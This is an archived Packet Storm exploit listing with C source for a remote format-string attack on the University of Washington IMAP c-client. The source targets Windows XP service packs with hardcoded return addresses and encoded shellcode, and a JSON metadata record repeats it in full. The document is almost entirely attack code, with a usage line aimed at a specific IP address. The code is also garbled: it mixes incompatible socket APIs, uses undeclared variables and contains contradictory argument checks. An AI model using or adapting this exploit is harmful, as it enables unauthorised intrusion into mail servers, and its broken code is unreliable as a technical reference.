ID PACKETSTORM:75063
Type packetstorm
Reporter Faryad Rahmany
Modified 2009-02-20T00:00:00
Description
`/*
# This BUg Discover By Faryad Rahmany
# C0d3d by Faryad rahmany
# website : http://rahmany.net
# University Of Washington IMAP c-client Remote FOrmat String
# Shellcode based on work by vlad902
# Greets to my best Freind : DJ7xpl
# UG : File Host Port Target
# Target 1 : WIndows XP Sp 1 : 0
# Target 2 : Windows XP Sp 2 : 1
# Target 3 : Windows XP Sp 3 : 2
# Ep : Attack.exe 78.38.23.49 143 2
# Sp Thanks To : AllaH
# compiled with visual c++ 6 : Attack.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define PORT 143
#define DATAOVERFLOW 2024
int main(int argc, char *argv[])
{
int sockfd, numbytes;
unsigned int system;
char buffer[DATAOVERFLOW];
char jmp[5];
struct hostent *he;
struct sockaddr_in tcp;;
struct sockaddr_in their_addr;
char winxpsp1[] = "\x57\x94\xAE\x77"; // not tested
char winxpsp2[] = "\xED\x1E\x94\x7C";
char winxpsp3[] = "\x7B\x46\x86\x7C";
char FAR[] = "\x47\x45\x54\x20\x2F";
WSADATA wsadata;
unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
"\x4e\x56\x46\x32\x46\x42\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x57"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48"
"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x4a\x52\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x34"
"\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x38"
"\x49\x38\x4e\x36\x46\x52\x4e\x51\x41\x46\x43\x4c\x41\x53\x4b\x4d"
"\x46\x56\x4b\x38\x43\x44\x42\x33\x4b\x58\x42\x44\x4e\x50\x4b\x58"
"\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x45\x4a\x56"
"\x50\x58\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46"
"\x43\x35\x48\x46\x4a\x36\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x47"
"\x44\x33\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x36\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x45\x43\x35\x43\x54"
"\x43\x55\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x31"
"\x4e\x45\x48\x56\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"
"\x4c\x31\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51"
"\x41\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x34\x48\x58\x49\x34\x47\x55\x4f\x4f\x48\x4d"
"\x42\x45\x46\x55\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x49\x4a\x56"
"\x47\x4e\x49\x47\x48\x4c\x49\x57\x47\x45\x4f\x4f\x48\x4d\x45\x35"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x46\x48\x46\x4a\x56\x43\x46"
"\x4d\x46\x49\x48\x45\x4e\x4c\x56\x42\x35\x49\x35\x49\x32\x4e\x4c"
"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x48\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x42\x50\x4f\x44\x54\x4e\x32"
"\x43\x59\x4d\x58\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
"\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x37\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x35\x44\x45\x41\x55\x41\x55\x41\x45\x4c\x56"
"\x41\x50\x41\x45\x41\x55\x45\x35\x41\x35\x4f\x4f\x42\x4d\x4a\x46"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f"
"\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
"\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x45\x43\x45\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";
if(argc < 3){
printf("***********************************************
\n"
" This BUg Discover By Faryad Rahmany
\n"
" C0d3d by Faryad rahmany
\n"
" website : http://rahmany.net
\n"
" University Of Washington IMAP c-client Remote FOrmat String \n"
" Shellcode based on work by vlad902
\n"
" Greets to my best Freind : DJ7xpl
\n"
" UG : File Host Port Target
\n"
" Target 1 : WIndows XP Sp 1 : 0
\n"
" Target 2 : Windows XP Sp 2 : 1
\n"
" Target 3 : Windows XP Sp 3 : 2
\n"
" Ep : Attack.exe 78.38.23.49 143 2
\n"
" Sp Thanks To : AllaH
\n"
" compiled with visual c++ 6 : Attack.c
\n"
"***********************************************\n",
argv[1]);
exit(-1);
}
printf("\n Attack on University Of Washington IMAP c-client");
system = (unsigned short)atoi(argv[3]);
switch(system)
{
case 1:
strcat(jmp,winxpsp1);
break;
case 2:
strcat(jmp,winxpsp2);
break;
case 3 :
strcat(jmp,winxpsp3);
break;
default:
printf("\n\r this target not find this list and exit \n\r");
exit(-1);
}
printf(" building Format string \n");
memset(buffer,shellcode,DATAOVERFLOW);
memcpy(buffer,shellcode,sizeof(shellcode)-1);
memcpy(buffer+256,jmp,sizeof(jmp)-1);
memcpy(buffer+243,FAR,sizeof(FAR)-1);
buffer[DATAOVERFLOW] = 0;
if (argc != 2) {
fprintf(stderr,"usage: client hostname\n");
exit(1);
}
if ((he=gethostbyname(argv[1])) == NULL) {
herror("gethostbyname");
exit(1);
}
if ((!he) && (addr == INADDR_NONE) ){
printf("unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("Fuck socket error\n");
exit(-1);
}
printf("\nAttack on University Of Washington IMAP c-client %s\n" ,
argv[1]) ;
Sleep(900);
printf("\npachet Send size = %d byte\n" , sizeof(buffer));
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
if ( WSAStartup(wVersionRequested, &wsadata) )
{
printf ("Erreur d'initialisation winsock !\n");
ExitProcess (1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr = *((struct in_addr *)he-h_addr);
bzero(&(their_addr.sin_zero), 8);
printf("\nSending exploit string...\n");
printf ("connecting to %s on port %u...", argv[1], ntohs ( sin.sin_port )
);
if (connect(sockfd, (struct sockaddr *)&their_addr, \
sizeof(struct sockaddr)) == -1) {
perror("connect");
exit(1);
}
fprintf(FILEsock,
"\xeb\x29"
"%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n%%n@@@@@@@@%s\r\n",
0x3C63FF-0x4f,shellcode);
if ((numbytes=recv(sockfd, buffer,DATAOVERFLOW, 0)) == -1) {
perror("recv");
exit(1);
}
buffer[numbytes] = '\0';
printf("Received: %s",buffer);
shutdown(sockfd,1);
closesocket(sockfd);
}
return 0;
}
`
{"id": "PACKETSTORM:75063", "type": "packetstorm", "bulletinFamily": "exploit", "title": "University of Washington IMAP Format String", "description": "", "published": "2009-02-20T00:00:00", "modified": "2009-02-20T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/75063/University-of-Washington-IMAP-Format-String.html", "reporter": "Faryad Rahmany", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:20:47", "viewCount": 2, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2016-11-03T10:20:47", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:47", "rev": 2}, "vulnersScore": -0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/75063/uwimap-format.txt", "sourceData": "`/* \n \n# This BUg Discover By Faryad Rahmany \n \n# C0d3d by Faryad rahmany \n \n# website : http://rahmany.net \n \n# University Of Washington IMAP c-client Remote FOrmat String \n# Shellcode based on work by vlad902 \n \n# Greets to my best Freind : DJ7xpl \n# UG : File Host Port Target \n \n# Target 1 : WIndows XP Sp 1 : 0 \n \n# Target 2 : Windows XP Sp 2 : 1 \n \n# Target 3 : Windows XP Sp 3 : 2 \n \n# Ep : Attack.exe 78.38.23.49 143 2 \n \n# Sp Thanks To : AllaH \n# compiled with visual c++ 6 : Attack.c \n \n \n*/ \n \n#include <stdio.h> \n#include <stdlib.h> \n#include <errno.h> \n#include <string.h> \n#include <netdb.h> \n#include <sys/types.h> \n#include <netinet/in.h> \n#include <sys/socket.h> \n#define PORT 143 \n#define DATAOVERFLOW 2024 \n \nint main(int argc, char *argv[]) \n{ \n \nint sockfd, numbytes; \nunsigned int system; \nchar buffer[DATAOVERFLOW]; \nchar jmp[5]; \nstruct hostent *he; \nstruct sockaddr_in tcp;; \nstruct sockaddr_in their_addr; \nchar winxpsp1[] = \"\\x57\\x94\\xAE\\x77\"; // not tested \nchar winxpsp2[] = \"\\xED\\x1E\\x94\\x7C\"; \nchar winxpsp3[] = \"\\x7B\\x46\\x86\\x7C\"; \nchar FAR[] = \"\\x47\\x45\\x54\\x20\\x2F\"; \nWSADATA wsadata; \n \n \nunsigned char shellcode[] = \n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\" \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\" \n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\" \n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\" \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x46\\x4b\\x4e\" \n\"\\x4d\\x54\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x46\\x4b\\x48\" \n\"\\x4e\\x56\\x46\\x32\\x46\\x42\\x4b\\x48\\x45\\x44\\x4e\\x43\\x4b\\x38\\x4e\\x57\" \n\"\\x45\\x50\\x4a\\x57\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x54\\x4a\\x41\\x4b\\x48\" \n\"\\x4f\\x55\\x42\\x32\\x41\\x30\\x4b\\x4e\\x49\\x34\\x4b\\x48\\x46\\x53\\x4b\\x48\" \n\"\\x41\\x30\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c\" \n\"\\x46\\x37\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\" \n\"\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x42\\x4a\\x52\\x45\\x47\\x45\\x4e\\x4b\\x48\" \n\"\\x4f\\x35\\x46\\x32\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x58\\x4e\\x30\\x4b\\x34\" \n\"\\x4b\\x58\\x4f\\x35\\x4e\\x31\\x41\\x30\\x4b\\x4e\\x43\\x30\\x4e\\x42\\x4b\\x38\" \n\"\\x49\\x38\\x4e\\x36\\x46\\x52\\x4e\\x51\\x41\\x46\\x43\\x4c\\x41\\x53\\x4b\\x4d\" \n\"\\x46\\x56\\x4b\\x38\\x43\\x44\\x42\\x33\\x4b\\x58\\x42\\x44\\x4e\\x50\\x4b\\x58\" \n\"\\x42\\x47\\x4e\\x41\\x4d\\x4a\\x4b\\x58\\x42\\x34\\x4a\\x50\\x50\\x45\\x4a\\x56\" \n\"\\x50\\x58\\x50\\x54\\x50\\x50\\x4e\\x4e\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x48\\x46\" \n\"\\x43\\x35\\x48\\x46\\x4a\\x36\\x43\\x53\\x44\\x53\\x4a\\x46\\x47\\x47\\x43\\x47\" \n\"\\x44\\x33\\x4f\\x55\\x46\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e\" \n\"\\x4e\\x4f\\x4b\\x33\\x42\\x55\\x4f\\x4f\\x48\\x4d\\x4f\\x55\\x49\\x58\\x45\\x4e\" \n\"\\x48\\x56\\x41\\x38\\x4d\\x4e\\x4a\\x50\\x44\\x50\\x45\\x35\\x4c\\x36\\x44\\x50\" \n\"\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x49\\x4d\\x49\\x30\\x45\\x4f\\x4d\\x4a\\x47\\x55\" \n\"\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x55\\x43\\x45\\x43\\x45\\x43\\x35\\x43\\x54\" \n\"\\x43\\x55\\x43\\x54\\x43\\x55\\x4f\\x4f\\x42\\x4d\\x48\\x36\\x4a\\x56\\x41\\x31\" \n\"\\x4e\\x45\\x48\\x56\\x43\\x45\\x49\\x48\\x41\\x4e\\x45\\x59\\x4a\\x46\\x46\\x4a\" \n\"\\x4c\\x31\\x42\\x47\\x47\\x4c\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x42\\x51\" \n\"\\x41\\x35\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x52\" \n\"\\x49\\x4e\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x43\\x35\\x45\\x55\\x4f\\x4f\\x42\\x4d\" \n\"\\x4a\\x36\\x45\\x4e\\x49\\x34\\x48\\x58\\x49\\x34\\x47\\x55\\x4f\\x4f\\x48\\x4d\" \n\"\\x42\\x45\\x46\\x55\\x46\\x55\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x43\\x49\\x4a\\x56\" \n\"\\x47\\x4e\\x49\\x47\\x48\\x4c\\x49\\x57\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x45\\x35\" \n\"\\x4f\\x4f\\x42\\x4d\\x48\\x46\\x4c\\x36\\x46\\x46\\x48\\x46\\x4a\\x56\\x43\\x46\" \n\"\\x4d\\x46\\x49\\x48\\x45\\x4e\\x4c\\x56\\x42\\x35\\x49\\x35\\x49\\x32\\x4e\\x4c\" \n\"\\x49\\x58\\x47\\x4e\\x4c\\x36\\x46\\x54\\x49\\x48\\x44\\x4e\\x41\\x43\\x42\\x4c\" \n\"\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x44\\x4d\\x42\\x50\\x4f\\x44\\x54\\x4e\\x32\" \n\"\\x43\\x59\\x4d\\x58\\x4c\\x47\\x4a\\x53\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x36\" \n\"\\x44\\x47\\x50\\x4f\\x43\\x4b\\x48\\x51\\x4f\\x4f\\x45\\x37\\x46\\x54\\x4f\\x4f\" \n\"\\x48\\x4d\\x4b\\x35\\x47\\x35\\x44\\x45\\x41\\x55\\x41\\x55\\x41\\x45\\x4c\\x56\" \n\"\\x41\\x50\\x41\\x45\\x41\\x55\\x45\\x35\\x41\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x46\" \n\"\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x55\\x4f\\x4f\\x48\\x4d\\x4c\\x36\" \n\"\\x4f\\x4f\\x4f\\x4f\\x47\\x43\\x4f\\x4f\\x42\\x4d\\x4b\\x48\\x47\\x55\\x4e\\x4f\" \n\"\\x43\\x38\\x46\\x4c\\x46\\x36\\x4f\\x4f\\x48\\x4d\\x44\\x35\\x4f\\x4f\\x42\\x4d\" \n\"\\x4a\\x46\\x42\\x4f\\x4c\\x38\\x46\\x50\\x4f\\x45\\x43\\x45\\x4f\\x4f\\x48\\x4d\" \n\"\\x4f\\x4f\\x42\\x4d\\x5a\"; \n \nif(argc < 3){ \nprintf(\"*********************************************** \n\\n\" \n\" This BUg Discover By Faryad Rahmany \n\\n\" \n\" C0d3d by Faryad rahmany \n\\n\" \n\" website : http://rahmany.net \n\\n\" \n\" University Of Washington IMAP c-client Remote FOrmat String \\n\" \n\" Shellcode based on work by vlad902 \n\\n\" \n\" Greets to my best Freind : DJ7xpl \n\\n\" \n\" UG : File Host Port Target \n\\n\" \n\" Target 1 : WIndows XP Sp 1 : 0 \n\\n\" \n\" Target 2 : Windows XP Sp 2 : 1 \n\\n\" \n\" Target 3 : Windows XP Sp 3 : 2 \n\\n\" \n\" Ep : Attack.exe 78.38.23.49 143 2 \n\\n\" \n\" Sp Thanks To : AllaH \n\\n\" \n\" compiled with visual c++ 6 : Attack.c \n\\n\" \n\"***********************************************\\n\", \nargv[1]); \nexit(-1); \n} \nprintf(\"\\n Attack on University Of Washington IMAP c-client\"); \nsystem = (unsigned short)atoi(argv[3]); \nswitch(system) \n{ \ncase 1: \nstrcat(jmp,winxpsp1); \nbreak; \ncase 2: \nstrcat(jmp,winxpsp2); \nbreak; \ncase 3 : \nstrcat(jmp,winxpsp3); \nbreak; \ndefault: \nprintf(\"\\n\\r this target not find this list and exit \\n\\r\"); \nexit(-1); \n} \nprintf(\" building Format string \\n\"); \nmemset(buffer,shellcode,DATAOVERFLOW); \nmemcpy(buffer,shellcode,sizeof(shellcode)-1); \nmemcpy(buffer+256,jmp,sizeof(jmp)-1); \nmemcpy(buffer+243,FAR,sizeof(FAR)-1); \nbuffer[DATAOVERFLOW] = 0; \nif (argc != 2) { \nfprintf(stderr,\"usage: client hostname\\n\"); \nexit(1); \n} \nif ((he=gethostbyname(argv[1])) == NULL) { \nherror(\"gethostbyname\"); \nexit(1); \n} \nif ((!he) && (addr == INADDR_NONE) ){ \nprintf(\"unable to resolve %s\\n\",argv[1]); \nexit(-1); \n} \nsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); \nif (!sock){ \nprintf(\"Fuck socket error\\n\"); \nexit(-1); \n} \nprintf(\"\\nAttack on University Of Washington IMAP c-client %s\\n\" , \nargv[1]) ; \nSleep(900); \nprintf(\"\\npachet Send size = %d byte\\n\" , sizeof(buffer)); \nif ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { \nperror(\"socket\"); \nexit(1); \n} \nif ( WSAStartup(wVersionRequested, &wsadata) ) \n{ \nprintf (\"Erreur d'initialisation winsock !\\n\"); \nExitProcess (1); \n} \ntheir_addr.sin_family = AF_INET; \ntheir_addr.sin_port = htons(PORT); \ntheir_addr.sin_addr = *((struct in_addr *)he-h_addr); \nbzero(&(their_addr.sin_zero), 8); \nprintf(\"\\nSending exploit string...\\n\"); \nprintf (\"connecting to %s on port %u...\", argv[1], ntohs ( sin.sin_port ) \n); \nif (connect(sockfd, (struct sockaddr *)&their_addr, \\ \nsizeof(struct sockaddr)) == -1) { \nperror(\"connect\"); \nexit(1); \n} \nfprintf(FILEsock, \n\"\\xeb\\x29\" \n\"%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n%%n@@@@@@@@%s\\r\\n\", \n0x3C63FF-0x4f,shellcode); \nif ((numbytes=recv(sockfd, buffer,DATAOVERFLOW, 0)) == -1) { \nperror(\"recv\"); \nexit(1); \n} \nbuffer[numbytes] = '\\0'; \nprintf(\"Received: %s\",buffer); \nshutdown(sockfd,1); \nclosesocket(sockfd); \n} \nreturn 0; \n} \n \n`\n", "immutableFields": []}
{}
